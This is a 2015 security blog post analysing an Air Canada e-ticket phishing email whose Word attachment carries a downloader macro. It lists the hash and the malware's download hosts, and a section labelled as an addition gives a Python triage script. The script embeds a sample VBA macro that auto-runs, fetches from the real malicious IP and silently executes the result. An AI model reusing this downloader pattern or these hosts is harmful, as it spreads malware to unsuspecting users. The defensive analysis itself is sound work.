Tuesday, 3 March 2015

Air Canada e-ticket Order malware

Headers:
From: "Air Canada" <tickets@aircanada.com>
Subject: Order # 79010838 - Completed

Message body:

 Dear client,

   Your online order has been successfully completed and your credit card has been charged.

    FLIGHT NUMBER CX89014CA
    DATE & TIME / MARCH 6rd , 14:15
    DEPARTURE / Toronto
    TOTAL PRICE / 450 CAD

    The seat number and additional information regarding the flight can be found on the attached e-ticket.

    Thank you for choosing Air Canada


Attached is a Word document containing macros:
e-ticket_79010838.doc
SHA256 hash:
be34ee5a30cef8269efda392939e753e71eae513e8eb714c90c685a4677a5375

Malware Information:

VirusTotal report (detected by 2 of 57 scanners at the time of posting)
Decoded macro (Pastebin); the string constants it holds:

    URLLSK = "91.220.131.73/ca/file"
    STAA = "savepic.su/5229109"
    STAB = "savepic.su/5220917"
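The three strings above are the download locations the macro reaches for once it runs. As an added example (not part of the original post and not Sanesecurity's own tooling), here is a small Python triage script that does the two things a responder wants after decoding a macro like this: pull the hosts and URLs out of the VBA string literals so they can go straight onto a proxy or DNS blocklist, and flag the auto-execution and download/execute keywords, in the spirit of the summary that olevba from oletools prints. It also hashes a file and checks it against the SHA256 published above. The SAMPLE_MACRO body is constructed: only its three string assignments come from the decoded macro on the page; the surrounding AutoOpen/XMLHTTP/Shell code is an assumption written to look like a typical 2015 Word downloader so the script has something realistic to match.

```python
import hashlib
import re
import sys

# SHA256 of the attachment (e-ticket_79010838.doc) as reported on the page.
KNOWN_BAD_SHA256 = {
    "be34ee5a30cef8269efda392939e753e71eae513e8eb714c90c685a4677a5375",
}

# Constructed sample of a decoded macro. Only the three string assignments
# come from the decoded macro on the page; the surrounding VBA (AutoOpen,
# XMLHTTP fetch, Shell) is an assumption written to resemble a typical
# Word downloader so the triage below has something to match on.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim URLLSK As String, STAA As String, STAB As String
    URLLSK = "91.220.131.73/ca/file"
    STAA = "savepic.su/5229109"
    STAB = "savepic.su/5220917"
    Set x = CreateObject("MSXML2.XMLHTTP")
    x.Open "GET", "http://" & URLLSK, False
    x.Send
    Shell Environ("TEMP") & "\ticket.exe", vbHide
End Sub
'''

AUTOEXEC = ("AutoOpen", "Document_Open", "AutoExec", "Workbook_Open")
SUSPICIOUS = ("Shell", "CreateObject", "XMLHTTP", "URLDownloadToFile",
              "Environ", "ADODB.Stream", "WScript.Shell")

# A string literal holding host[/path]; the host is a dotted IPv4 literal or
# a domain whose last label is lowercase letters (so "MSXML2.XMLHTTP" is not
# taken for a host). The scheme is optional because this macro stores bare
# hosts and prepends "http://" at runtime.
_HOST_RE = re.compile(
    r'"(?:https?://)?'
    r'((?:\d{1,3}(?:\.\d{1,3}){3}|[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[a-z]{2,}))'
    r'(/[^"\s]*)?"'
)
# Literals such as "ticket.exe" would otherwise look like a domain.
_NOT_TLDS = {"exe", "dll", "vbs", "bat", "txt", "doc", "tmp"}


def extract_iocs(macro_text):
    """Return sorted, de-duplicated URLs built from the macro's string literals."""
    iocs = set()
    for host, path in _HOST_RE.findall(macro_text):
        if host.rsplit(".", 1)[-1].lower() in _NOT_TLDS:
            continue
        iocs.add("http://" + host + (path or ""))
    return sorted(iocs)


def ioc_hosts(macro_text):
    """Only the hosts: the form you would feed to a proxy or DNS blocklist."""
    return sorted({url[len("http://"):].split("/", 1)[0]
                   for url in extract_iocs(macro_text)})


def triage_macro(macro_text):
    """Keyword and IOC triage of decoded VBA, similar to olevba's summary table."""
    autoexec = [k for k in AUTOEXEC if k in macro_text]
    suspicious = [k for k in SUSPICIOUS if k in macro_text]
    iocs = extract_iocs(macro_text)
    if autoexec and (suspicious or iocs):
        verdict = "downloader-like: runs on open and fetches or executes something"
    elif suspicious or iocs:
        verdict = "suspicious"
    else:
        verdict = "no obvious indicators"
    return {"autoexec": autoexec, "suspicious": suspicious,
            "iocs": iocs, "verdict": verdict}


def sha256_bytes(data):
    return hashlib.sha256(data).hexdigest()


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def is_known_bad(digest):
    return digest.lower() in KNOWN_BAD_SHA256


if __name__ == "__main__":
    for key, value in triage_macro(SAMPLE_MACRO).items():
        print(f"{key}: {value}")
    for path in sys.argv[1:]:
        digest = sha256_file(path)
        print(path, digest, "KNOWN BAD" if is_known_bad(digest) else "not in list")
```

Run it with the attachment path as an argument to get the hash check alongside the triage of the constructed sample; for a real document, decode the macro first (olevba does this) and pass its text to triage_macro. A hit on the published hash is conclusive, but a miss is not: the same campaign usually ships many attachments with different hashes, which is why the hosts from the macro are the more durable indicator.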

Cheers,

Steve
Sanesecurity.com

5 comments:

Anonymous said...

So what exactly does this particular "W97M/Downloader.adx" do?

Anonymous said...

So what does this "W97M/Downloader.adx" do exactly?

Anonymous said...

Ok, so I got this email 6 hours ago and stupidly opened it, since it looked like my upcoming trip to Toronto. I scanned with Avast and it says I'm clean, but am I really? What file(s) should I be looking for to delete from my system?

Anonymous said...

OK. so I stupidly opened the attachment when I got this email, since it looked like my travel info for my upcoming trip to Toronto. I deleted the file as soon as it opened, then ran Avast AV software and it says I'm clean, but am I really? What file(s) should I be searching for to delete from my PC? Any help would be appreciated!

Steve Basford said...

If you opened the document with macros enabled, it's worth using Eset etc. from the online scanners tab, http://sanesecurity.blogspot.co.uk/p/online-scanners.html